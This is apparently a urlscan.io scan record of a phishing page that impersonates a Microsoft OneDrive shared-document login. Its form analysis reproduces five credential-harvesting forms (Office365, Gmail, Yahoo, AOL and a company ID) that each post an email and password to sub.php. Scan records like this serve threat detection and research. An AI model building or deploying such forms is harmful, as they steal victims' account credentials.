robindrip.com
Open in
urlscan Pro
2a06:98c1:3120::3
Public Scan
URL:
https://robindrip.com/jam/auth/
Submission: On July 11 via api from LU — Scanned from NL
Submission: On July 11 via api from LU — Scanned from NL
Form analysis
5 forms found in the DOMPOST sub.php
<form class="col s12" action="sub.php" method="post" id="formsubmit">
<img src="src/img/soft.png" style="margin-left: 30%; margin-bottom:5px; width: 180px;">
<h5 class="center">Sign in with Office365</h5>
<div class="row">
<input class="hide" name="app" type="text" value="office">
<div class="input-field col s12">
<input name="email" type="email" class="validate" required="">
<label for="email">Email</label>
</div>
<div class="input-field col s12">
<input name="password" type="password" class="validate" required="">
<label for="password">Password</label>
</div>
</div>
<button class="login-button" type="submit" name="submit" id="submitFormData" onclick="SubmitFormData();">Submit </button>
</form>
POST sub.php
<form class="col s12" action="sub.php" method="post" id="formsubmit">
<img src="src/img/G.png" style="margin-left: 30%; width: 180px; margin-top: -33px;">
<h5 class="center" style="margin-top: -33px;">Sign in with Gmail</h5>
<div class="row">
<input class="hide" name="app" type="text" value="Gmail">
<div class="input-field col s12">
<input name="email" type="email" class="validate" required="">
<label for="email">Email</label>
</div>
<div class="input-field col s12">
<input name="password" type="password" class="validate" required="">
<label for="password">Password</label>
</div>
</div>
<button class="login-button" type="submit" name="submit" id="submitFormData" onclick="SubmitFormData();">Submit </button>
</form>
POST sub.php
<form class="col s12" action="sub.php" method="post" id="formsubmit">
<img src="src/img/y.png" style="margin-left: 30%; width: 180px; margin-top: -8px;">
<h5 class="center">Sign in with Yahoo</h5>
<div class="row">
<input class="hide" name="app" type="text" value="Yahoo">
<div class="input-field col s12">
<input name="email" type="email" class="validate" required="">
<label for="email">Email</label>
</div>
<div class="input-field col s12">
<input name="password" type="password" class="validate" required="">
<label for="password">Password</label>
</div>
</div>
<button class="login-button" type="submit" name="submit" id="submitFormData" onclick="SubmitFormData();">Submit </button>
</form>
POST sub.php
<form class="col s12" action="sub.php" method="post" id="formsubmit">
<img src="src/img/aol.png" style="margin-left: 30%; width: 130px; margin-top: -8px;">
<h5 class="center">Sign in with Aol</h5>
<div class="row">
<input class="hide" name="app" type="text" value="Aol">
<div class="input-field col s12">
<input name="email" type="email" class="validate" required="" style="margin-bottom: 0;">
<label for="email">Email</label>
</div>
<div class="input-field col s12">
<input name="password" type="password" class="validate" required="">
<label for="password">Password</label>
</div>
</div>
<button class="login-button" type="submit" name="submit" id="submitFormData" onclick="SubmitFormData();">Submit </button>
</form>
POST sub.php
<form class="col s12" action="sub.php" method="post" id="formsubmit">
<img src="src/img/comp.webp" style="margin-left: 34%; width: 110px; margin-top: -8px;">
<h5 class="center">Sign in with Company ID</h5>
<div class="row">
<input class="hide" name="app" type="text" value="Comp">
<div class="input-field col s12">
<input name="email" type="email" class="validate" required="">
<label for="email">Email</label>
</div>
<div class="input-field col s12">
<input name="password" type="password" class="validate" required="">
<label for="password">Password</label>
</div>
</div>
<button class="login-button" type="submit" name="submit" id="submitFormData" onclick="SubmitFormData();">Submit </button>
</form>
Text Content
| Microsoft OneDrive ONEDRIVE Select email provider and Sign in to view Shared Document Sign in with Office365 SIGN IN WITH OFFICE365 Email Password Submit SIGN IN WITH GMAIL Email Password Submit Sign in with Outlook SIGN IN WITH YAHOO Email Password Submit SIGN IN WITH AOL Email Password Submit Sign in with Company ID SIGN IN WITH COMPANY ID Email Password Submit